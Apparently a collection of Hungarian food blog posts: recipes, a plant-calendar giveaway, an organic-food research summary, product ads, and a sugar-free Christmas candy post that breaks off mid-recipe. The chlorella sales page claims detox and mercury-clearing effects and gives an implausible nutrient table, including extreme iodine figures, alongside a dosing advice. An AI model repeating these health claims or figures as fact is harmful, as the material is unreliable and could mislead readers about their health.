Tamás szerint a legfontosabb a bátorság, és jó kedv, ha a konyhában vagyunk, mert “…sütni jó, süteményt enni pedig nem bűn.“.
Bereznay Tamás túrógombóc receptje
Hozzávalók:
- 1 kg túró
- 2 evőkanál búzadara
- 2 evőkanál liszt
- 4 evőkanál olaj
- 1 db tojás
- 2 evőkanál zsemlemorzsa
- a forgatáshoz: 100 g zsemlemorzsa , 40 g vaj
A túróhoz hozzákeverjük a búzadarát, majd a lisztet, az olajat, a tojást és végül a zsemlemorzsát (nagyon fontos, hogy a sorrendet tartsuk be!). Hűtőben fél órát pihentetjük, majd vizes kézzel egyforma gombócokat formázunk belőle. Forrásban lévő vízbe dobjuk őket, és miután feljöttek a víz tetejére, még egy percig főzzük a gombócokat.
Serpenyőben megolvasztjuk a vajat, a zsemlemorzsát ropogós aranybarnára pirítjuk benne. Ebben forgatjuk meg még forrón a kifőtt gombócokat. Tálaláskor ne felejtsünk el porcukorral és reszelt citromhéjjal elkevert tejfölt adni hozzá.
*****
A könyvet a {Boook Kiadó} biztosította a teszteléshez. A recept a kiadó engedélyével jelent meg. A véleményem csakis a sajátom.
Vadnövény naptár nyereményjáték a Collective Plant-tal
2014. december 16. Zizi kalandjai
Fotó: Glódi Balázs – MENÜ
A Collective Plant ötlete kedves barátnőm, Illés Zsófi elméjéből pattant ki. Zsófi azt találta ki, hogy a városban és környékén elérhető rengeteg természeti forrással ismerkedjünk meg és tanuljuk meg hasznosítani az így vadon begyűjtött növényeket. Le kell szögeznem, hogy imádom a Collective Plant-et… azt a szívből áradó munkát, amit a hagyományőrzésért, a környezetért, a közösségépítésért tesznek szinte önkéntes alapon. Nagy rajongójuk lettem, biztosan ott leszünk Ádival jövő tavasszal az egyik vadnövény gyűjtögető túrájukon!
A városi gyűjtögetés nem egy elvonatkoztatott tétel, hiszen rengeteg zöldterületen szedhetünk ehető vadnövényeket, mindössze az a praktikus tudás hiányzik hozzá, amivel életben tarthatnánk magunkat. Ezt a deficitet a Collective Plant városi, vagy városközeli túrákkal hozza be, olyan oktatási eszközökkel, ami a közösségi megosztáson alapszik. A jelenlegi tagok közös érdeklődésüknek, a fotózásnak, az újságírásnak, és az ételeknek akartak egy komolyabb csomópontot, ahol rengeteg művészeti munka, az ökoaktivizmust mélységeiben bemutató elméleti írás, és gyűjtögető knowhow áramlik keresztül. A városi élelmiszerforrásokra rámutató közös kirándulások jelentik a csoport működésének alapját, az online jelenlétben pedig egy jóval komplexebb tartalom bomlik ki.
Fotó: Glódi Balázs – MENÜ
A Collective Plant a gasztronómián keresztül is igyekszik befogadó lenni, ezért az ehető vadnövények elkészítési lehetőségeire sokszor vegán, glutén- illetve laktózmentes javaslatokat is tesz - a weblapon elérhető receptek egy része az ételintoleranciával élőknek is választékot kínál. A túrákon az éppen elérhető, szezonálisan termő, ehető vagy gyógyhatású növényeket kutatják fel, a résztvevők nemcsak a szedésre, hanem a feldolgozásra is kapnak tippeket, bőven a tartósítás horizontján túl.
Fotó: Glódi Balázs – MENÜ
A túrákon kívül szerveznek étel- és magcseréket, vadnövényes főzéseket, workshopokat (teakeverés, textilfestés). 2014. december 20-án szombaton a Lumen Zöldségesben vadnövényes karácsonyi vásárt tartanak. Ennek a bevétele a CP munkáját és minden egyes tárgy esetében az alkotó képzőművész munkáját támogatja.
A vásáron kaphatóak lesznek:
- vadnövénynaptár és fanzinok
- gyűjtött vadnövényes/gyógynövényes karácsonyi fűszersók/fürdősók
- gyűjtött gyógynövényes karácsonyi fenyőrügyes tea
- vadgyümölcs-fűszer-gyógynövény bitterek
- tea/fűszer matricák
- festett táskák
- karácsonyi képeslapok
És a legfontosabb… a nemrégiben limitált példányszámban (1000 db) megjelent MENÜ szakácskönyvben is megjelentek, amely egy receptgyűjtemény, melyhez 22 budapesti alkotó adja a hozzávalókat. A szakácskönyv egyben történetek gyűjteménye is, azoké az embereké, akik a mai budapesti gasztrokultúra alakításán dolgoznak. Gratulálok a Collective Plant csapatának!
A Collective Plant elérhető az alábbi linkeken:
- Weboldal
- Facebook
- Vimeo
*****
NYEREMÉNYJÁTÉK!!!
Nyeremény : egy darab Collective Plant vadnövény naptár felhasználási ötletekkel, receptekkel.
Írjátok meg ide a bejegyzés alá kommentben, hogy ti voltatok-e már vadon termő növényeket gyűjtögetni és ha igen, akkor mit készítettek belőle. Ha nem voltatok még, akkor is kommentáljatok, hogy például szeretnétek-e menni! :) Kérem, hogy az alábbi formula minden pontját töltsétek ki; ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a szürke I commented! kockára; ha még nem vagy ha már lájkoltátok a Collective Plant Facebook oldalát, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a szürke I visited! kockára. Ezenkívül osszátok meg a játékot itt a bejegyzés alatt található megosztási lehetőségek egyikével (Facebook, Twitter).
a Rafflecopter giveaway
Szabályok : 2014. december 16-tól december 19-ig lehet játszani. Eredményhirdetés december 20-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertesnek a nyereményt a Collective Plant postázza magyarországi címre.
Almás pite mandulás tésztával
Anyának van egy nagyon jó receptje az almás pitéihez - illetve inkább a fejében és a kezében van. :) Nagyon finomat tud készíteni, abból indultam ki. A mandula a tejföl helyettesítésén gondolkozva jutott eszembe. A gyereknek nagyon tetszett, mert a fél rácsot a süti tetejéről Ő eszegette meg, mint édes ropit... Hozzávalók egy nagy tepsire való süteményhez: 2 kg alma 60 dkg liszt (nekem 40 dkg tk tönköly, a többi fehér) 25 dkg pálma sütőzsír / margarin 10 dkg darált mandula kb. 2,5 dl almalé / növényi tej 2 ek gyümölcscukor 1 cs sütőpor (foszfátmentes borkő) 1 csipet só Az almát nagy lyukú reszelőn lereszeljük. Ha jó leves, húsos, édes, akkor levét kinyomkodjuk, és azt tesszük majd a tésztához. A mandulát ledaráljuk. A lisztet összekeverjük a sóval, cukorral, sütőporral, és a darált mandulával. A keveréket a pálmazsírral elmorzsoljuk. Azután annyi folyadékot adunk a liszthez, amennyitől rugalmas tésztát kapunk, aminek a két harmadát ujjnyi vastagra kinyújtjuk, és kibélelünk vele egy tepsit. A tésztára ráhalmozzuk az almát, amit megszórhatunk kis gyümölcscukorral, de ha édes alma, anélkül is nagyon finom tud lenni. A maradék tésztát vékonyra nyújtjuk, kétfelé vágjuk, majd félcentis csíkokra, amikkel keresztben az alma tetején rácsokat formálunk. Candidások a két hónap letelte után próbálkozhatnak vele. A tésztába keverjenek lenmagot, teljes kiőrlésű lisztből készüljön az egész, és gyümölcscukor helyett használjanak sztíviát.
Vegán gluténmentes édesburgonya brownie
2014. december 10. Zizi kalandjai
Szeretem a brownie-t, csak az a baj, hogy a tökéletes brownie állaghoz (puha, selymes, ragacsos, szinte nedves tészta) nagyon sok cukor kell. A bűntudatmentes brownie elérte a tökéletesség szintjét, de nyers… ami nem baj, sőt, még jót is teszünk magunkkal, ha így esszük. Most viszont találtam egy sült változatot Ellanál (imádom a blogját), ami puha, selymes, ragacsos, nedves tésztájú (az édesburgonyának köszönhetően), nagyon kevés édesítőszer (juharszirup és datolya) van benne, vegán és ráadásul gluténmentes is! Egy picit változtattam a recepten, több kakaót és juharszirupot tettem bele és adtam hozzá néhány evőkanál mandulatejet.
Az édesburgonyát gőz felett kell megpárolni, majd datolyával pépesre turmixolni. Ez a kettő egy olyan tökéletes “baba pudingot” alkot, hogy Ádikám remegve sikítozott az újabb kanálnyi adagért! Egyébként nemcsak babáknak tökéletes, hanem felnőtteknek is… mi tagadás, együtt nyaltuk ki Ádival a robotgép tartályát! Kiváló reggelire, délutáni snacknek a teánk vagy a kávénk mellé. Az is eszembe jutott, hogy ebből tortát fogok sütni, mondjuk kókusz tejszínhabbal a tetején… tökéletes karácsonyi desszert lesz!
A megadott mennyiségből egy elég kis adag lesz (12*20 cm-es tepsire elég), szóval érdemes egyből a dupláját készíteni!
Vegán gluténmentes édesburgonya brownie
Hozzávalók:
- 600 g édesburgonya (meghámozott súly), felkockázva
- 100 g hajdinaliszt
- 80 g darált mandula
- 16-18 db puha, aszalt datolya (mérettől függ és, hogy mennyire szeretnénk édesre)
- 7 evőkanál kakaópor/karobpor
- 6 evőkanál juharszirup
- 2-3 evőkanál mandulatej
- csipet só
Az édesburgonyát pároljuk puhára egy vízzel teli lábas felett kb. 20 perc alatt. Tegyük a robotgépbe és pürésítsük simára a datolyával. Vigyázat, nehéz abbahagyni, ha egyszer megkóstoljuk!
Melegítsük elő a sütőt 180C fokra.
Egy tálban keverjük össze a hajdinalisztet, a darált mandulát, a kakaót és a sót. Adjuk hozzá a pürésített édesburgonyát, a juharszirupot és a mandulatejet. Keverjük simára. Sűrű, nem folyós tésztát kell kapnunk.
A kis tepsit béleljük ki sütőpapírral (ha szilikon formát használunk, akkor nem kell kibélelni) és kanalazzuk bele a tésztát. Tegyük a sütőbe és süssük 180 fokon kb. 25-30 percig. Végezzünk próbát, ha nem ragad semmi a késre, akkor jó. Hagyjuk kihűlni a formában (ekkor ragad jól össze) és utána vágjuk kockákra.
Új (pozitív) kutatási eremény a biotermékekről!
Egy a Newcastle University (UK) által vezetett nemzetközi szakértőkből álló csoport bebizonyította, hogy az ökotermelésből származó terményekben és az ökoterményekből készült élelmiszerekben 60%-kal magasabb az antioxidáns tartalom, mint a konvencionális gazdálkodásból származó termékekben. A Brittish Journal of Nutrition-ben megjelent cikk szerint az ökogyümölcs, ökozöldség és ökogabona fogyasztásra való átállás annyival több antioxidánst juttat a szervezetbe, mintha 1-2 adaggal több zöldséget, gyümölcsöt fogyasztanánk. Emellett kimutatták, hogy drasztikusan alacsonyabb a mérgező nehézfémek aránya az ökogabonákban. Carlo Leifert, a Newcastle University professzora szerint, aki a tanulmányt vezette, ez a jelentés egy fontos kiegészítése a vásárlók birtokában lévő információknak, ami egyébként eddig elég zavaros és néha ellentmondó is volt. A mérések kimutatták, hogy az étel minősége nagyban függ az előállítás módjától. Különösen, a gyárilag előállított, leginkább a nitrogén és foszfát alapú műtrágyák magas szintje estén kaptak a mérések során lényegesen alacsony antioxidáns koncentrációt a vizsgált konvencionális terményekben. Az ökológiai mezőgazdálkodásban a fentebb említett műtrágyák használata szigorúan tilos. Ökotermények és az ökoterményekből készült élelmiszerekben sokkal magasabb az antioxidáns koncentráció (beleértve a fenolos savakat, flavannonokat, sztilbéneket, flavonokat, antociánokat) összehasonlítva a konvencionális terményekkel. Az átlagos különbség az antioxidáns koncentrációban minimum 18% volt, de némely fajtáknál elérte a 68%-ot is. Kisebb százalékban, de még mindig statisztikailag (is) jelentős eltérést találtak a vitaminok és karotinoidok vizsgálata során. Az ökotermék fogyasztásra való átállással 20-40%-kal növelhetjük étrendünkben a táplálékkal bevitt antioxidánsok mennyiségét anélkül, hogy a bevitt kalória mennyiségét növelnénk. A (poli)fenolok és egyéb antioxidánsok segítenek bizonyos krónikus betegségek, köztük a szív-és érrendszeri problémák és néhány rákos megbetegedés megelőzésében is. Alacsonyabb mérgező nehézfém, különösen kadmium koncentrációt (átlagosan 48%-kal alacsonyabb) mutattak ki az ökoterményekből. A Kadmium, annak a 3 nehéz fém egyike az ólom és a higany mellett, melyre az Európai Bizottság maximális engedélyezett szintet vezetett be. A kadmium akkumulálódik, felhalmozódik az emberi szervezetben, a bevitel csökkentés bármely formája csak segítheti a szervezetet. A nitrogén koncentráció is alacsonyabbnak bizonyult az ökotermények körében. A nitrogén 10%-kal, a nitrát 30%-kal, a nitrit 87%-kal volt alacsonyabb, mint a konvencionális terményekben. A konvencionális gazdálkodás során bevett, gyakori műtrágya használat tudományosan összekapcsolható az előállított terményekben fellelhető magas nitrogén, nitrit és nitrát tartalommal. Ezek az anyagok bel tartalmilag nem kívánatosak egy élelmiszerben, mivel magas kockázati tényezőt jelentenek szervi betegségek, például gyomorrák esetén. A tanulmány azt is kimutatta, hogy négyszer magasabb az esélye, hogy rovarölő szer maradványt találunk a konvencionális termékekben. Csak a gyümölcsöknél a konvencionális termesztésből származó mintákban hétszer többször találtak szermaradványt, mint az ökogyümölcsben. Ugyanez a vizsgálat a zöldségek és egyéb termékek esetében is háromszoros vagy négyszeres eltérést mutatott. További tanulmányokra van szükség, hogy pontosan megállapíthassuk a szermaradvány bevitel csökkenésének egészségre gyakorolt hatását, de azt már kimondhatjuk, hogy a bevitel csökkentésének bármely formája hasznos az emberi szervezetnek. A vizsgált konvencionális termények nagy része meghaladta az EFSA ( European Food Safety Authority) szermaradványokra szabott engedélyezett szintet. A mostani tanulmány emellett komoly hiányosságokat fedett fel az előzőleg kiadott tanulmányok nagy részében és a Newcastle University szakértői egyetértettek abban, hogy a jövőben ezen hiányosságokon alapuló félreértések elkerülése végett, a termény összehasonlító tanulmányok egységesítése szükséges. Ez a tanulmány a legátfogóbb analízis az öko és konvencionális termények beltartalmi értékei témában. Ez az új módszeres irodalmi áttekintésnek és a Carlo Leifert mellett álló nemzetközi szakértő csapat meta-analízis technikájának köszönhető. A teljes adatbázis, amit ehhez a tanulmányhoz felhasználtak szabadon elérhető a Newcastle University weboldaláról ide kattitva Forrás: http://www.organic-market.info/ http://www.biokultura.org/index.php/rss-feed/77-hirek/532-tanulmany-az-ok-es-konvencionalis-termenyekrol Fordította: Szlovicsák Katalin
Chlorella kisokos
Superfoods. Hasztnáljuk. Szeretjük. Ajánljuk! Vége a nyári buja gazdagságnak a kertekben, a lédús zöldségek és salátafélék kiélvezhettük még az ősszel. Most már egyre kevesebbet tudjuk süttetni az arcunkat a napon egy kis D-vitaminért és előkerültek a szezon jól ismert gyökeres zöldségei, a savanyú káposzta. Igen, itt a Tél. Hogy segítsük egészségünket, egyensúlyunkat, tápláljuk immunrendszerünket télen is, weboldalunkon bemutatunk egy-egy szupertáplálékot, amit mi is használunk, szeretünk és ajánlunk! Chlorella alga A CHLORELLA sötétzöld színű édesvízi alga, mely már több mint 2 milliárd éve létezik a Földön. Nevét a klorofillról kapta, jelenlegi ismereteink szerint a chlorella a legmagasabb klorofill tartalmú növény bolygónkon. Kimagasló klorofill (4-5 %) és egyéb pigment tartalmának köszönhetően méregtelenítő hatású, a nehézfémek szervezetből való kivezetését segíti. Amalgám töméseink cseréjénél különösen ajánlatos a chlorella fokozott fogyasztása, mert így megakadályozható, hogy a fúrás során szervezetünkbe kerülő higany lerakódjon. Magas rosttartalma fokozza a bélműködést, kitisztítja a bélrendszert, így elősegítve a tápanyagok felszívódását. ?Az chlorella alga a klorofillon kívül jelentős mértékű növényi fehérjét tartalmaz. Megtalálhatunk benne továbbá minden aminosavat, fontos ásványi anyagokat, nyomelemeket (magnézium, kálium, kalcium, vas, jód, mangán, cink) és vitaminokat (B, C és E). ?Csökkenti az étkezések közötti éhségérzetet.?Ez a sötétzöld színű édesvízi alga tökéletes összetételű tápanyag. Tápanyag információ 100g-ban Fehérje 58.1g Zsír 6.7g Szénhidrát 11.2g Pantotésav (B5 vit.) 0.13g Folsav 2.3mg Összes Karotin 917mg Biotin (B7 vit.) 100mcg Vitamin B1 1.29mg Vitamin B2 3.1mg Vitamin B6 0.96mg Vitamin B12 50.0mcg Vitamin C 2.6mg Vitamin E 8.9mg Vas 210mg Cink 69.8mg Foszfor 1210mg Potassium 882.5mg Kalcium 330mg Jód 680.7mg Kalória 326Kcal Hogyan fogyasszuk? A CHLORELLA port bármikor fogyaszthatjuk, naponta akár többször is, kis mennyiségben. Méregtelenítési tüneteket okozhat, ezért kis adagokban (napi fél teáskanál) fogyasszuk először és csak pár nap elteltével növeljük az adagot napi 3 grammig. Joghurtba (ha fogyasztassz), nyers levesekbe, zöld vagy gyümölcsturmixba, karakteres ízű gyümölcs- vagy zöldséglébe, salátába, reggeli granolával magtejbe keverve ajánljuk. Amennyiben fogyasztásakor bármilyen kellemetlenséget (hasmenés, fejfájás) tapasztalunk az alga méregtelenítő tulajdonságának köszönhetően, átmenetileg csökkentsük az adagot és növeljük a folyadékbevitelt. Fontos, hogy mint minden erős, új táplálék esetén, a chlorella fogyasztásánál is ügyeljünk a fokozatosságra. A 125 grammos csomag ára 3120 Ft. A linkre kattintva megvásárolhatod tőlünk: katt!
Reform Aranygaluska és kistestvére, "Ezüstgaluska"
2014. december 4. Zöld Avocado
Bár a kelt tészták egyáltalán nem tartoznak az egészséges ételek közé, én jó magyar módra nem tudok teljesen lemondani róluk. :-) Az egyik ilyen nagy kedvenc az iskolai menzát idéző aranygaluska. Még nem találkoztam olyan emberrel, aki nem szeretné a sodóban úszó diós kis gombócokat. :-) Reform aranygaluska és ezüst kistestvére Természetesen ennek is el lehet készíteni, egy kevésbé hízlaló, emészthetőbb, gyomorbarát verzióját, mely fehér cukor, fehér liszt és laktóz mentes. Így is elég magas a kalória tartalma, de nálunk nem az (el)fogyás a szempont, hanem az emészthetőség. Így pedig megállja a helyét néha napján az itthoni menüben! ;-) A teljes kiőrlésű lisztekben a gabona korpája is megtalálható, amely tápanyagokban gazdag és segíti az emésztést. A teljes kiőrlésű gabonákból készült termékek amellett, hogy sok hasznos élelmi rostot, vitamint és ásványi anyagot (E-vitamin, B-vitamin, kálium, kalcium, magnézium, foszfor) tartalmaznak, segítenek megelőzni a rák, a cukorbetegség és a szívbetegségek kialakulását is. Reform "ezüstgaluska" HOZZÁVALÓK: (kb. 2 személyre 2 étkezésre) a tésztához: - 175 g teljes kiőrlésű tönköly liszt - 75 g rizs-, vagy mandula-, vagy lenmagliszt - 25 g porcukor (nyírfacukorból, vagy nádcukorból készítsük el a porcukrot a kávédarálónkban) - 25 g jó minőségű növényi alapú margarin (ha szeretnénk tartani a laktóz mentességet) - 1 tasak por élesztő (instant és kb.20 g) - csapott tk. szódabikarbóna - 1/2 tk Himalája só - 1 db egész tojás - 120 ml növényi tej (mandula tejjel a legjobb) - 1 db kezeletlen citrom reszelt héja a diós ,,panírhoz: - 130 g frissen darált dió (Ne vegyünk agyoncukrozott valódi diót nem látott noname dió ízű keverékeket!) - 40 g nyírfacukor vagy nádcukor - kb. 1/2 bögrényi olvasztott növényi margarin vagy kókusz zsír - (a mákoshoz a dió helyett mákot használjunk) Reform aranygaluska a sodóhoz: (Sokféle receptet kipróbáltam már, de nekünk ez ízlett a legjobban!) - 1/2 liter növényi tej (mandulatejjel vagy mogyoró tejjel a legjobb) - 2 tojás sárgája - 50 g nyírfacukor vagy Nádcukor - 2 ek liszt sűrítéshez (ez lehet pl.: rizsliszt) - 1/4 rúd vanília vagy 1 ek vanília extract/kivonat - 1 dkg növényi margarin ELKÉSZÍTÉS: A tésztához való száraz összetevőket mérjük ki és tegyük egy keverő tálba. Egy másik kisebb keverőtálban keverjük/habarjuk össze a folyékony összetevőket egyneműre (a margarint én megszoktam olvasztani előtte). Majd öntsük hozzá a száraz részhez, és gyúrjunk belőle kelt tészta alapanyagot. Akkor jó, ha nem túl kemény, még ragad, de nem ragad teljesen a kezünkre. Egy lágyabb, még növekedni képes tésztát kellene kapnunk. Használjunk még lisztet, vagy tejet, annak függvényében, hogy a tésztánk milyen állagot vett fel ?! Tegyük a tésztát meleg helyre kelni 1 órára. Ha nem süt a nap, vagy nem megy éppen a fűtőtest a lakásban, akkor érdemes a sütőbe tenni. DE ne süssük meg a nyers tésztát! Csak kelesszük. Hogy hogyan? Melegítsük elő a sütőt 50 fokra, majd kapcsoljuk le. Ezután tegyük be a tésztánkat a keverőtálban a sütőbe, és takarjuk le egy tiszta konyharuhával. Sütő ajtót becsukni, de nem bekapcsolni a sütőt! 1 óra alatt szépen megkel a tésztánk. Persze mivel teljes kiőrlésű lisztből készül, ezért ne várjuk ugyanazt a hatást, mint egy fehér lisztes kelt tésztánál. Puha, és ruganyós lesz, de nem fog túl magasra megkelni. Sebaj, a könnyebb emészthetőség oltárán beáldozhatjuk a térfogat növekedést, és a puhaságot. ;-) A ,,panírozáshoz keverjük össze a frissen darált diót az édesítőszerünkkel, és egy külön kis müzlis tálban olvasszuk meg a zsiradékot (növényi vaj vagy kókuszzsír). Miután a tésztánk már 1 órát melegedett a sütőben, kivesszük, és kinyújtjuk kb. 2 cm vastagságúra. Ehhez használjuk a már jól ismert ,,2 sütőpapír között nyújtunk trükköt, és akkor nem ragad semmi sehová, és könnyebb mosogatni is utána. :-) A kinyújtott tésztánkból nagyobb pogácsa szaggatóval félholdformákat szaggatunk. Ezeket a holdacskákat megfürdetjük az olvasztott zsiradékban, majd meghempergetjük az édesített dióban, és egy sütőpapírral bélelt magas falú tepsibe, vagy tortaformába pakoljuk őket, szorosan egymás mellé. Miután megtelt a forma, elfogyott a tészta, letakarjuk, és újabb fél órát kelesztjük a nyers aranygaluskákat. Ekkor már nem szükséges a sütőt előmelegíteni, elég, ha csak egy nem hideg helyen pihentetjük őket. Eltelt az újabb fél óra. A sütőt közben előmelegítettük 170 °C fokra. Betesszük a galuskákat, és 30-35 perc alatt légkeveréses programon készre, aranybarnára sütjük. Közben elkészítjük a sodót hozzá. A tojás sárgáját 1 dl növényi tejjel, az édesítőszerrel és a liszttel csomómentesre elkeverjük. A maradék növényi tejet a vaníliával felforraljuk, és forrón hozzáöntjük a tojássárgás keverékhez. Tűzre tesszük az egészet, és folytonos keverés mellett addig főzzük, míg sűrűsödni nem kezd. Forrni nem szabad neki, mert a tojássárgája összecsomósodik benne. (Ez esetben turmixoljuk össze kézi bot mixerrel a sodót.) Ha a tűzről levesszük, beletesszük a kevés kis növényi margarint, és fényesre keverjük. Nem lesz ez a sodó olyan sűrű mártás, mint a hagyományos menzai, mert a növényi tej nem tud úgy behártyásodni, mint az állati eredetű tej. De az íz élmény felülmúlhatatlan marad! ;-) Reform aranygaluska és ezüst kistestvére (nyersen) Előfordul, hogy nem marad elég diós ,,panír. Ilyenkor sem kell kétségbe esni! Ekkor kerül elő a szekrényből a mák, és készül el az aranygaluska kistestvére, vagy mondhatnám a kínai utángyártott verzió, az ,,ezüstgaluska! :-D A mákot és az édesítőt összekeverjük (ha szeretnénk a mákot meg is darálhatjuk, de egészben is fogyasztható.) És ebben a fekete ,,panírban forgatjuk meg a vajas galuskákat. A többi minden ugyanaz, mint a diós változatban. Ugyanúgy készül el, és ugyanúgy fogyaszthatjuk a sodóval. Szerintem ez is nagyon finom! ;-) Általában két adag tésztát készítek, és az egyik fele diós, a másik fele mákos lesz. Egyik nap aranygaluskát eszünk, a második nap már csak ezüstöt. :-D reform aranygaluska és kistestvére "ezüstgaluska" Megjegyzés1: Valahol olvastam egy ötletes megoldást, hogyan lehet felhasználni az ilyen jellegű tésztákból megmaradt tojásfehérjéket?! Kb. 3 db fehérjéhez keverjünk hozzá 3 ek. búzadarát, 3 ek. reszelt sajtot, sót, borsot, és muffin formában süssük ki a ropogós sajt roppancsokat. Jól hangzik, bár ki még nem próbáltam, mert nálunk általában elfogy a következő napi rántottában a megmarad tojás fehérje. ;-) Megjegyzés2: A mákos galuskához el tudok képzelni a sodó helyett egy gyorsan elkészíthető házi lekvárt. Pl.: Nagyon fekete szőlőt leturmixolunk 1 ek útifűmaghéjjal, és beleteszünk 1 ek darált chia magot. Az egészet betesszük a hűtőbe egy éjszakára, és kész is a cukor mentes, villámgyors, házi lekvár.
Új termékünk: bio nyers Kakaóvaj
Végre, már a webshopunkban is elérhető aKakaóvaj! A csokoládé készítés elengedhetetlen alapanyaga. Kiváló, nyers minőségű kakaóvaj, élmény vele a munka! 42 fok fölé nem hevítették a feldolgozás során, így minden pozitív tulajdonságát megőrizte. Ez a kakaóvaj Criollo fajtából származik, mely a legritkább és legízletesebb kakaóbab. Tőlünk 250g-s kiszerelésben rendelheted meg. De igény esetén nagyobb kiszerelésben is kérheted. Származási helye: Peru 3560 Ft/250g A Sületlenségek bonbonok és csokoládék, illetve a Fibonacci csokoládék is ezzel a kakaóvajjal készülnek!
Sütőtökös bagett
Van-e otthon sütőtök? Sül-e abban sütőtök? Lesz-e ebéd tök ételes, Finom ízű tökéletes? (Nyulász Péter: Van-e otthon?)
Nem bírtam ki, hogy a megsült sütőtököt ne próbáljam ki a kenyértésztába keverni. Máskor is megcsinálom, ha úgy adódik, hogy lesz itthon sült sütőtök, és épp kenyeret sütök. "Finom ízű", mondhatni "tökéletes" :) enyhén édeskés-fűszeres íze lett.
A recept:
Hozzávalók:
- 2,7 dkg friss élesztő
- 3 dl meleg víz
- 25 dkg teljes kiőrlésű liszt
- 35 dkg fehér liszt (BL-55)
- 10 dkg sült vagy párolt sütőtök
- 2 evőkanál olaj
- 1,2 dkg só
- 3 dkg őrölt lenmag (elhagyható)
- 2-3 fokhagyma összenyomva
Elkészítés:
A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a meleg vizet.
Várunk egy rövid ideig, míg az élesztő feloldódik a víz tetejére. Ha cukrot, vagy mézet is raktunk hozzá, akkor az élesztő a víz felszínére kel. Nálam ennek hiányában csak feloldódik és inkább az alján terül el.
Közben elővesszük a többi hozzávalót.
Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is. Beletesszük a kenyérsütő gépbe és a dagasztó-kelesztő programot beállítva a gép elvégzi a dagasztást, kelesztést. Amikor kész a tészta, három részre osztjuk. Bagett-formát készítünk kezünkkel, tepsire tesszük, majd a tetejét bevagdossuk. Sütés előtt a a tepsiben érdemes még kb. 15-20 percet meleg helyen konyharuhával letakarva keleszteni. Kb. 30 perc alatt készre sütjük.
Tudod, mi van a bolti szaloncukorban? Így készíts cukormentes szaloncukrot!
2014. december 2. Éltető ételek
Évekkel ezelőtt, a korábbi munkahelyemen karácsonyra mindig kaptunk egy doboz szaloncukrot. Mire eljött a karácsony, már nem volt belőle, mindet felfaltam. Nos, azóta már sok víz lefolyt a Dunán, már évek óta nem veszek a boltban szaloncukrot. Viszont kíváncsiságból mindig megfordítom az üzletekben a szaloncukros dobozokat, zacskókat, és elolvasom az összetevőket. Elmondhatom, hogy évek óta nincs változás. Mindig ugyanazokat a "szemét" szaloncukrokat árulják. Igen, valóban így gondolom, ugyanis ezek táplálkozástudományi szempontból semmi értékeset nem tartalmaznak a szervezetünk számára. Sőt... Ha folytatod az olvasást, akkor elárulom, hogy miért is gondolom ezt így. Először is utánanéztem, hogy a Magyar Élelmiszerkönyv mit is ír a szaloncukorról. "A szaloncukor a karácsonyi ünnepkörhöz kötött, hagyományos termék, amely meghatározott szemnagyságú, két végén rojtozott selyempapírba és színes alufóliába vagy fóliába/fémgőzölt fóliába, pillangós zárással, szemenként csomagolt édesipari készítmény. A kiszáradás megakadályozására és az élvezeti érték növelésére a szemeket védőbevonattal (kandiszréteg vagy csokoládé-, illetve egyéb bevonat) látják el. " Hát eddig nem tudtuk meg, hogy mi is az előírás a szaloncukor összetevőit figyelembe véve. Nos, nem is tudjuk meg. Legalábbis ebben az irányelvben nincs meghatározva. Nézzük tovább: "Szaloncukorfajták Kandírozott szaloncukor: olyan szaloncukor, amelynek korpusza cukorkristály réteggel (kandisz) van bevonva.Mártott szaloncukor: olyan szaloncukor, amelynek korpusza ét-, tej- vagy fehércsokoládéval, illetve kakaós, kakaós tej vagy fehér bevonómasszával van bevonva. A bevonat aránya legalább 20%.Töltött (formázott) szaloncukor: olyan szaloncukor, amelynek külső része ét-, tej- fehércsokoládé-vagy bevonómassza. A burok aránya a termék összes tömegének legalább 25%-a.Fondanszaloncukor (konzum szaloncukor): olyan szaloncukor, amelynek korpusza fondanból készül, ízesítőanyagokkal ízesített, kandírozott vagy csokoládéval, illetve egyéb anyaggal van bevonva. Dúsított fondanszaloncukor: olyan szaloncukor, amelynek korpusza olajosmagvak, gyümölcsök, puffasztott gabonafélék stb. felhasználásával készül. A dúsítóanyagok mennyisége legalább 5% (m/m).Zselés szaloncukor: olyan szaloncukor, amelynek korpusza zselé, illetve gyümölcszselé.Marcipán-szaloncukor: olyan szaloncukor, amelynek korpusza mandulamarcipán, mogyorómarcipán, diómarcipán, kókuszmarcipán vagy vegyes marcipán. Vajkaramellás szaloncukor: olyan szaloncukor, amelynek korpusza vajkaramella." Kíváncsiságból tovább keresgéltem, hogy mit is ír az egyes cukorfajtákról: "Zselécukorka: A zselécukorkák kocsonyás, könnyen deformálható szerkezetű kolloid rendszerek, amelyeket cukor, glükózszirup, esetleg invertcukorszirup, különféle zselésítőanyagok és jellegkialakító adalékanyagok (ízesítő, színező) felhasználásával öntéssel formáznak és a felületüket védőbevonattal (kristálycukor, csokoládé, bevonómassza stb.) látják el. A megnevezés tartalmazza a ,,zselé vagy a 2,5% gyümölcs szárazanyagot tartalmazó termék esetén a,,gyümölcszselé szavakat, valamint az ízesítésre való utalást. " Akkor most nézzük meg konkrétan egy híres cukorgyár zselés szaloncukorjának összetevőjét: Málna ízű sziruppal töltött, citrom ízű zselé, kakaós étbevonó masszával mártva: cukor, glükóz szirup, kakaós étbevonó massza 20% [cukor, növényi zsír, zsírszegény kakaópor(10%), emulgeálószer (szójalecitin), aromák (csokoládé- vanília)], étkezési sav (citromsav), zselésítő anyag (pektin), aromák ( citrom, málna), színezék (E120) TI EZT MEG AKARJÁTOK ENNI??? Vagy ezt adjátok a gyerekeiteknek?? Semmi természetes NINCS benne! Tovább nem is szeretnék ezzel foglalkozni, inkább mutatok 3 olyan szaloncukor receptet, amit te magad is elkészíthetsz, és még hozzáadott cukrot SEM tartalmaz. Nem, mintha baj lenne a cukorral, ha az természetes. Nyugodtan használhatsz termelői mézet, kókuszvirágcukrot vagy akár nyers nádcukrot is. NYERS, EGÉSZSÉGES és TÁPLÁLÓ. 1. Narancsos brownie szaloncukor Hát ilyen finomat... nemhiába, a brownie mindig finom. Ez a tészta sok nyers süteményem alapja is, de most csak úgy natúr, szaloncukor készült belőle. Hozzávalók: - 20 dkg áztatott, szárított dió - 10 dkg áztatott, szárított mandula - 20 dkg cukrozatlan, aszalt 